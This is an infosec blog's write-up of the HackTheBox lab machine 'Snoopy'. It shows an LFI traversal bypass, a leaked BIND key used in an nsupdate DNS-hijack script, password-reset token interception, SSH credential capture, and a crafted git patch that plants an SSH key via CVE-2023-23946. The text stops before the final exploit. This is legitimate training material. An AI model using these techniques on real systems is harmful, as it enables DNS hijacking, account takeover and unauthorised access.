<!DOCTYPE html><html lang="en"mode="dark"><!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><!-- i18n for `_javascript/utils/timeago.js` -->
    <meta name="day-prompt" content="days ago">
    <meta name="hour-prompt" content="hours ago">
    <meta name="minute-prompt" content="minutes ago">
    <meta name="justnow-prompt" content="just now"><!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="Snoopy - HackTheBox" />
<meta property="og:locale" content="en" />
<meta name="description" content="Snoopy is a hard-rated linux machine on HackTheBox. It starts with a domain takeover by leaking DNS key to takeover a Mattermost account and exploit a custom command to capture SSH credentials. You’ll then move to another local user by exploiting CVE-2023-23946 affecting git apply. Privilege escalation to root is through ClamAV." />
<meta property="og:description" content="Snoopy is a hard-rated linux machine on HackTheBox. It starts with a domain takeover by leaking DNS key to takeover a Mattermost account and exploit a custom command to capture SSH credentials. You’ll then move to another local user by exploiting CVE-2023-23946 affecting git apply. Privilege escalation to root is through ClamAV." />
<link rel="canonical" href="https://4g3nt47.github.io/posts/hackthebox/snoopy.html" />
<meta property="og:url" content="https://4g3nt47.github.io/posts/hackthebox/snoopy.html" />
<meta property="og:site_name" content="4g3nt47" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-09-23T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Snoopy - HackTheBox" />
<meta name="twitter:site" content="@UmarAbdoul" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"description":"Snoopy is a hard-rated linux machine on HackTheBox. It starts with a domain takeover by leaking DNS key to takeover a Mattermost account and exploit a custom command to capture SSH credentials. You’ll then move to another local user by exploiting CVE-2023-23946 affecting git apply. Privilege escalation to root is through ClamAV.","@type":"BlogPosting","url":"https://4g3nt47.github.io/posts/hackthebox/snoopy.html","headline":"Snoopy - HackTheBox","dateModified":"2023-09-23T00:00:00+01:00","datePublished":"2023-09-23T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://4g3nt47.github.io/posts/hackthebox/snoopy.html"},"@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<title>Snoopy - HackTheBox | 4g3nt47
  </title><!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
--><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="4g3nt47">
<meta name="application-name" content="4g3nt47">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">
<!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA --><!-- Bootstrap -->
  <link rel="stylesheet" href="/assets/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="/assets/css/all.min.css"><!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet"
    href="/assets/css/bootstrap-toc.min.css"><!-- Manific Popup -->
  <link rel="stylesheet" href="/assets/css/magnific-popup.min.css"><!-- JavaScript -->

  <script src="/assets/js/jquery.min.js"></script>

</head>
<body data-spy="scroll" data-target="#toc"><!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end" lang="en">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto"><img src="/assets/img/avatar.png" alt="avatar" onerror="this.style.display='none'"></a>
    </div>

    <div class="site-title mt-3">
      <a href="/">4g3nt47</a>
    </div>
    <div class="site-subtitle font-italic">Welcome to my infosec blog</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs --><li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i><span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i><span>TAGS</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i><span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item --><li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i><span>ABOUT</span>
      </a>
    </li> <!-- .nav-item --></ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"><a href="https://github.com/4g3nt47" aria-label="github"target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a><a href="https://twitter.com/UmarAbdoul" aria-label="twitter"target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a><a href="javascript:location.href = 'mailto:' + ['aufaruq02','gmail.com'].join('@')" aria-label="email">
        <i class="fas fa-envelope"></i>
      </a><a href="/rss/feed.xml" aria-label="rss">
        <i class="fas fa-rss"></i>
      </a></div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->
<!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb"><span>
            <a href="/">
              Home
            </a>
          </span><span>Snoopy - HackTheBox</span></span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">Post</div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>
<div id="main-wrapper">
      <div id="main">

        <div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><!--
  Refactor the HTML structure.
--><!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
--><!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
--><!-- Add attribute 'hide-bullet' to the checkbox list --><!-- images --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add CDN URL --><!-- Add image path --><!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> --><!-- Add SVG placehoder to prevent layout reflow --><!-- Bypass the HTML-proofer test --><!-- Add header for code snippets --><!-- Create heading anchors --><!-- return -->

<h1 data-toc-skip>Snoopy - HackTheBox</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <div>By
    <em><a href="https://twitter.com/UmarAbdoul">Umar Abdul</a></em>
  </div>

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        Posted<!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
--><em class="timeago"
    date="2023-09-23 00:00:00 +0100"data-toggle="tooltip"
      data-placement="bottom"
      title="Sat, Sep 23, 2023, 12:00 AM +0100">Sep 23</em>
</span>

      <!-- lastmod date --><!-- read time --><!--
  Calculate the post's reading time, and display the word count in tooltip
 --><!-- words per minute  --><!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="1155 words">
  <em>6 min</em> read</span>
<!-- page views --></div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p><strong>Snoopy</strong> is a hard-rated linux machine on <em>HackTheBox</em>. It starts with a domain takeover by leaking DNS key to takeover a <em>Mattermost</em> account and exploit a custom command to capture SSH credentials. You’ll then move to another local user by exploiting <strong>CVE-2023-23946</strong> affecting <code class="language-plaintext highlighter-rouge">git apply</code>. Privilege escalation to <code class="language-plaintext highlighter-rouge">root</code> is through <em>ClamAV</em>.</p>

<p><br /></p>

<h3 id="info">Info<a href="#info" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p><img data-src="/assets/img/Pasted image 20230830210816.png" alt="" data-proofer-ignore></p>

<p><img data-src="/assets/img/Pasted image 20230830210924.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="recon">Recon<a href="#recon" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<h4 id="nmap">NMAP<a href="#nmap" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>
<p><br /></p>

<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre># Nmap 7.80 scan initiated Sat Aug 26 12:34:01 2023 as: nmap -sC -sV -oN nmap.txt -v 10.10.11.212
Nmap scan report for 10.10.11.212
Host is up (0.54s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.18.12-0ubuntu0.22.04.1-Ubuntu
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: SnoopySec Bootstrap Template - Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 26 12:35:09 2023 -- 1 IP address (1 host up) scanned in 68.00 seconds
</pre></td></tr></tbody></table></code></div></div>

<p><br /></p>

<h4 id="web">Web<a href="#web" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>
<p><br /></p>

<p><img data-src="/assets/img/Pasted image 20230830211441.png" alt="" data-proofer-ignore></p>

<p>The contact page gave a warning regarding <code class="language-plaintext highlighter-rouge">mail.snoopy.htb</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230830213727.png" alt="" data-proofer-ignore></p>

<p>Attempting to send an email gave an error;</p>

<p><img data-src="/assets/img/Pasted image 20230830213820.png" alt="" data-proofer-ignore></p>

<p>Download link on the page reveals the domain name;</p>

<p><img data-src="/assets/img/Pasted image 20230830212015.png" alt="" data-proofer-ignore></p>

<p>Clicking the link started a download for a <code class="language-plaintext highlighter-rouge">.zip</code> file;</p>

<p><img data-src="/assets/img/Pasted image 20230830212516.png" alt="" data-proofer-ignore></p>

<p>Nothing of much interest was found inside;</p>

<p><img data-src="/assets/img/Pasted image 20230830212213.png" alt="" data-proofer-ignore></p>

<p>The <code class="language-plaintext highlighter-rouge">file</code> parameter looks interesting though. Testing for an LFI, it appears the application is using some filter, and is starting a download for an empty file;</p>

<p><img data-src="/assets/img/Pasted image 20230830212845.png" alt="" data-proofer-ignore></p>

<p>Testing for common bypass, I was able to gain LFI by nesting the traversal sequences;</p>

<p><img data-src="/assets/img/Pasted image 20230830213037.png" alt="" data-proofer-ignore>
<img data-src="/assets/img/Pasted image 20230830213305.png" alt="" data-proofer-ignore></p>

<p><br /></p>

<h4 id="dns">DNS<a href="#dns" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4>
<p><br /></p>

<p>Now that we have a domain name, we can begin poking at the DNS server. Testing for zone transfer, it seems to be enabled, and I was able to dump some DNS records, which I added to my <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file;</p>

<p><img data-src="/assets/img/Pasted image 20230830213540.png" alt="" data-proofer-ignore></p>

<p>Note that <code class="language-plaintext highlighter-rouge">email.snoopy.htb</code> is not here, as hinted in the warning earlier. An instance of <em>Mattermost</em> is running on <code class="language-plaintext highlighter-rouge">mm.snoopy.htb</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230830214217.png" alt="" data-proofer-ignore></p>

<p>There is a password reset page that accepts email address;</p>

<p><img data-src="/assets/img/Pasted image 20230830214404.png" alt="" data-proofer-ignore></p>

<p>This is likely a DNS hijack exercise since the mail domain is currenly unregistered. Testing this with <code class="language-plaintext highlighter-rouge">nsupdate</code> gave an error that’s likely due to lack of creds;</p>

<p><img data-src="/assets/img/Pasted image 20230830214648.png" alt="" data-proofer-ignore></p>

<p>NMAP showed the DNS server is <strong>BIND</strong>, which by default has config file at <code class="language-plaintext highlighter-rouge">/etc/bind/named.conf</code>. Dumping this using the LFI, I got a key;</p>

<div class="language-javascript highlighter-rouge"><div class="code-header"><span label-text="JavaScript"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td><td class="rouge-code"><pre><span class="c1">// This is the primary configuration file for the BIND DNS server named.</span>
<span class="c1">//</span>
<span class="c1">// Please read /usr/share/doc/bind9/README.Debian.gz for information on the </span>
<span class="c1">// structure of BIND configuration files in Debian, *BEFORE* you customize </span>
<span class="c1">// this configuration file.</span>
<span class="c1">//</span>
<span class="c1">// If you are just adding zones, please do that in /etc/bind/named.conf.local</span>

<span class="nx">include</span> <span class="dl">"</span><span class="s2">/etc/bind/named.conf.options</span><span class="dl">"</span><span class="p">;</span>
<span class="nx">include</span> <span class="dl">"</span><span class="s2">/etc/bind/named.conf.local</span><span class="dl">"</span><span class="p">;</span>
<span class="nx">include</span> <span class="dl">"</span><span class="s2">/etc/bind/named.conf.default-zones</span><span class="dl">"</span><span class="p">;</span>

<span class="nx">key</span> <span class="dl">"</span><span class="s2">rndc-key</span><span class="dl">"</span> <span class="p">{</span>
    <span class="nx">algorithm</span> <span class="nx">hmac</span><span class="o">-</span><span class="nx">sha256</span><span class="p">;</span>
    <span class="nx">secret</span> <span class="dl">"</span><span class="s2">BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=</span><span class="dl">"</span><span class="p">;</span>
<span class="p">};</span>
</pre></td></tr></tbody></table></code></div></div>

<p>With this key, I wrote a simple script <code class="language-plaintext highlighter-rouge">dns_hijack.py</code> for connecting to the server and adding a new record for the <code class="language-plaintext highlighter-rouge">mail.snoopy.htb</code> and point it to my box;</p>

<div class="language-python highlighter-rouge"><div class="code-header"><span label-text="Python"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="c1">#!/bin/bash
</span>
<span class="n">echo</span> <span class="s">"[*] Hijacking mail.snoopy.htb"</span>
<span class="n">echo</span> <span class="s">"server 10.10.11.212
key hmac-sha256:rndc-key BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=
update add mail.snoopy.htb 86400 A 10.10.16.73
send
quit
"</span> <span class="o">|</span> <span class="n">nsupdate</span>
<span class="n">nslookup</span> <span class="n">mail</span><span class="p">.</span><span class="n">snoopy</span><span class="p">.</span><span class="n">htb</span> <span class="mf">10.10</span><span class="p">.</span><span class="mf">11.212</span>
</pre></td></tr></tbody></table></code></div></div>

<p>It worked;</p>

<p><img data-src="/assets/img/Pasted image 20230830215322.png" alt="" data-proofer-ignore></p>

<p>Now we need to know some email addresses of potential users. The <em>team</em> section of the main page has a few;</p>

<p><img data-src="/assets/img/Pasted image 20230830215828.png" alt="" data-proofer-ignore></p>

<p>I then setup a <a href="https://github.com/VaderZ/fakesmtp">fake SMTP server</a>, execute <code class="language-plaintext highlighter-rouge">dns_hijack.py</code>, and requested a reset for <code class="language-plaintext highlighter-rouge">sbrown@snoopy.htb</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230830220429.png" alt="" data-proofer-ignore></p>

<p>The email is broken a bit and some <code class="language-plaintext highlighter-rouge">=</code> are added where they shouldn’t be. Also notice the <code class="language-plaintext highlighter-rouge">3D</code> in front of the above token, which is the hex form of <code class="language-plaintext highlighter-rouge">=</code>. The cleaned up token is <code class="language-plaintext highlighter-rouge">nyhndmdhpjozsss39aih1tph6izk3q3iqo1e4ddb3uu7rsxgtqqyupyit4ohpp4a</code>, and I was able to reset the password of <code class="language-plaintext highlighter-rouge">sbrown@snoopy.htb</code> and login;</p>

<p><img data-src="/assets/img/Pasted image 20230830221018.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="foothold">Foothold<a href="#foothold" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p>The <em>Town Square</em> channel has some interesting messages;</p>

<p><img data-src="/assets/img/Pasted image 20230830221215.png" alt="" data-proofer-ignore></p>

<p>I don’t see any other channel, so I switched to the account of <code class="language-plaintext highlighter-rouge">cbrown</code> using the same exploit;</p>

<p><img data-src="/assets/img/Pasted image 20230830221451.png" alt="" data-proofer-ignore></p>

<p>We now have access to the channel, but it’s empty. Checking for channel commands by typing <code class="language-plaintext highlighter-rouge">/</code> in the message field, something stood out;</p>

<p><img data-src="/assets/img/Pasted image 20230830221628.png" alt="" data-proofer-ignore></p>

<p>Typing the command opened a dialog. Filling the form and sumitting sent a request to my host;</p>

<p><img data-src="/assets/img/Pasted image 20230830221837.png" alt="" data-proofer-ignore>
<img data-src="/assets/img/Pasted image 20230830221855.png" alt="" data-proofer-ignore></p>

<p><em>Paramiko</em> is a popular python library for doing SSH operations, so I setup a <a href="https://github.com/internetwache/SSH-Honeypot">fake SSH</a> server. This time, we captured some creds;</p>

<p><img data-src="/assets/img/Pasted image 20230830222101.png" alt="" data-proofer-ignore></p>

<p>Testing this cred on the box over SSH, I was able to login;</p>

<p><img data-src="/assets/img/Pasted image 20230830222219.png" alt="" data-proofer-ignore></p>

<hr />

<p><br /></p>

<h3 id="user">User<a href="#user" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><br /></p>

<p><code class="language-plaintext highlighter-rouge">cbrown</code> has <code class="language-plaintext highlighter-rouge">sudo</code> perms to run <code class="language-plaintext highlighter-rouge">git apply</code> as the user <code class="language-plaintext highlighter-rouge">sbrown</code>;</p>

<p><img data-src="/assets/img/Pasted image 20230830222344.png" alt="" data-proofer-ignore></p>

<p><code class="language-plaintext highlighter-rouge">git apply</code> is a command used to apply git patches, which are generated using <code class="language-plaintext highlighter-rouge">git diff</code>. After some local tests, I was able to craft a path file that could add an SSH key to <code class="language-plaintext highlighter-rouge">.ssh/authorized_keys</code> in sbrown’s home dir;</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header"><span label-text="Plaintext"><i class="fas fa-code small"></i></span><button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>diff --git a/sbrown/.ssh/authorized_keys b/sbrown/.ssh/authorized_keys
new file mode 100644
index 0000000..039727e
--- /dev/null
+++ b/sbrown/.ssh/authorized_keys
@@ -0,0 +1,1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDn76zZKBkOP+bame5OO1cXGsn91xbO5NPO5H4XqCpGIiDqDMA0Vzpqb9MtNHOYu3tqtqDSe9moL3x/X/s9qYTlTvJjM05WJyZ1e1zy6w60GRTx1ZbyTxe4sOFesYFASsUwptnAE9ZK/+ea0OqrB0gbvpgjsmIqgNlTld8FXwV+wkoA9G9KKUzXPeb0ogWNoWRiZLsjdlz0YHqOOO52wXRtasE0HTiWeadP/5xkkjXH8C5hZ+2Vath9+ZOiMmbZFewRG3YryT6uWETHwQCJA4N0vaN2HgUuPO/HoIBvy05fyQPv5M1Tz8rlgiHobdl6/MvhhhYzza4qDJDmGVd+XNbU7xJAZ7Fzx7ekaiVSXy8meS3ScAAbX5DFrvAxx6Z6HwLPGFk1C0hG1/5lYsF0m90PGdhfVmrzNs2+5tVWnc/7MawNEBQ8YnZm7vflo03Va+BEUw3lD1SlXtJj6lAqDf5sAkxvYKerHntFvo/T6xUy17gyuQ6CJPPtgL9esik9kFs= agent47@debian
</pre></td></tr></tbody></table></code></div></div>
<p><img data-src="/assets/img/Pasted image 20230830222914.png" alt="" data-proofer-ignore></p>

<p>Problem is to be able to use this payload, I need write permission on any of the parent diretories of <code class="language-plaintext highlighter-rouge">/home/sbrown</code>, which are only 2: <code class="language-plaintext highlighter-rouge">/</code>, and <code class="language-plaintext highlighter-rouge">/home</code>, none of which I can write to. This is because the regex applied to the filename is strictly alphanumeric, so I can’t pass a config file stored in another directory. My first thought is to use symbolic links to exploit this, but <code class="language-plaintext highlighter-rouge">git</code> is not allowing it;</p>

<p><img data-src="/assets/img/Pasted image 20230830223401.png" alt="" data-proofer-ignore></p>

<p>Further googling lead me to this <a href="https://github.blog/2023-02-14-git-security-vulnerabilities-announced-3/">advisory</a>, which mentions <strong>CVE-2023-23946</strong> for exploiting <code class="language-plaintext highlighter-rouge">git apply</code> using symbolic links. No PoC seems to be available for this, but the <a href="https://github.com/git/git/commit/c867e4fa180bec4750e9b54eb10f459030dbebfd#diff-8273385c4a17d688bbbd5f8297c84241a174c6e6aea289370b57294fd988eaa6">patch commit</a> showed some test code used to test if the patch was successful;</p>

<p><img data-src="/assets/img/Pasted image 20230830223835.png" alt="" data-proofer-ignore></p>

<p>This was enough to build an exploit that would drop an SSH key into the home directory of <code class="language-plaintext highlighter-rouge">sbrown</code>;</p>

